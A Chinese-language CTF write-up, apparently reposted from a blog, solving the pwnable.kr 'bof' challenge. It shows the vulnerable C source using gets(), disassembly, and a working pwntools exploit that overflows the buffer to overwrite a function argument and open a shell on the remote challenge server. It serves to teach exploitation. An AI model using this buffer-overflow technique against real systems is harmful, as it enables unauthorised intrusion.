PWN学习之[Toddler''s Bottle]-[bof]
来源:互联网 发布:手机淘宝联系天猫客服 编辑:程序博客网 时间:2024/06/13 01:45
将bof和bof.c文件下载下来
#include <stdio.h>#include <string.h>#include <stdlib.h>void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); // smash me! if(key == 0xcafebabe){ system("/bin/sh"); } else{ printf("Nah..\n"); }}int main(int argc, char* argv[]){ func(0xdeadbeef); return 0;}
通过bof.c可以看到当key==0xcafebabe时获得shell,但是由于func函数传入的实参为0xdeadbeef,看起来不可能实现get shell
但是我们注意到func函数通过gets函数获取overflowme的值,这就给了我们溢出的基础,通过溢出overflowme覆盖key的值从而使的key==0xcafebabe。
查看func的汇编代码
0x0000062c <+0>: push ebp 0x0000062d <+1>: mov ebp,esp 0x0000062f <+3>: sub esp,0x48 0x00000632 <+6>: mov eax,gs:0x14 0x00000638 <+12>: mov DWORD PTR [ebp-0xc],eax 0x0000063b <+15>: xor eax,eax 0x0000063d <+17>: mov DWORD PTR [esp],0x78c 0x00000644 <+24>: call 0x645 <func+25> 0x00000649 <+29>: lea eax,[ebp-0x2c] //[ebp-0x2c]为overflowme 0x0000064c <+32>: mov DWORD PTR [esp],eax 0x0000064f <+35>: call 0x650 <func+36> 0x00000654 <+40>: cmp DWORD PTR [ebp+0x8],0xcafebabe //[ebp+0x8]为key 0x0000065b <+47>: jne 0x66b <func+63> 0x0000065d <+49>: mov DWORD PTR [esp],0x79b 0x00000664 <+56>: call 0x665 <func+57> 0x00000669 <+61>: jmp 0x677 <func+75> 0x0000066b <+63>: mov DWORD PTR [esp],0x7a3 0x00000672 <+70>: call 0x673 <func+71> 0x00000677 <+75>: mov eax,DWORD PTR [ebp-0xc] 0x0000067a <+78>: xor eax,DWORD PTR gs:0x14 0x00000681 <+85>: je 0x688 <func+92> 0x00000683 <+87>: call 0x684 <func+88> 0x00000688 <+92>: leave 0x00000689 <+93>: ret
通过汇编代码我们可以看到,[ebp-0x2c]即为overflowme,[ebp+0x8]为key。所以我们只需要填充52个字节再加上0xcafebabe即可获得shell。
因此我们的exp为
from pwn import *payload='a'*52+p32(0xcafebabe)#p=process("./bof")p=remote('pwnable.kr',9000)p.recvline()p.recvuntil("\n")p.sendline(payload)p.interactive()
再执行cat flag命令即可获取flag了。
最后附上文件方便实践:链接
阅读全文
0 0
- PWN学习之[Toddler''s Bottle]-[bof]
- PWN学习之[Toddler''s Bottle]-[fd]
- PWN学习之[Toddler''s Bottle]-[passcode]
- [Toddler's Bottle]bof
- [Toddler's Bottle]-[bof]
- Pwnable之[Toddler's Bottle]
- [Toddler's Bottle]fd
- [Toddler's Bottle]collision
- [Toddler's Bottle]-[fd]
- [Toddler's Bottle]-collision
- [Toddler's Bottle]flag
- [Toddler's Bottle]-[flag]
- [Toddler's Bottle]-[leg]
- pwnable.kr [Toddler's Bottle]
- pwnable.kr [Toddler's Bottle]
- pwnable.kr [Toddler's Bottle]
- pwnable.kr [Toddler's Bottle]
- pwnable.kr [Toddler's Bottle]
- mac os x 之通过远程主机在nginx上部署web静态页面
- j2ee常用的设计模式
- C语言二维数组作为函数参数传递剖析
- java 抽象方法 能用 静态 static 修饰,或者 native 修饰 么
- CSAPP第三版运行时打桩Segmentation fault
- PWN学习之[Toddler''s Bottle]-[bof]
- 安卓 消息队列 优先级 顺序
- PWN学习之[Toddler''s Bottle]-[fd]
- python列表中元素去重的几种方式
- 一个应用 可以有多个application
- PWN学习之[Toddler''s Bottle]-[passcode]
- 结构体大小
- 安卓系统启动过程
- 条件变量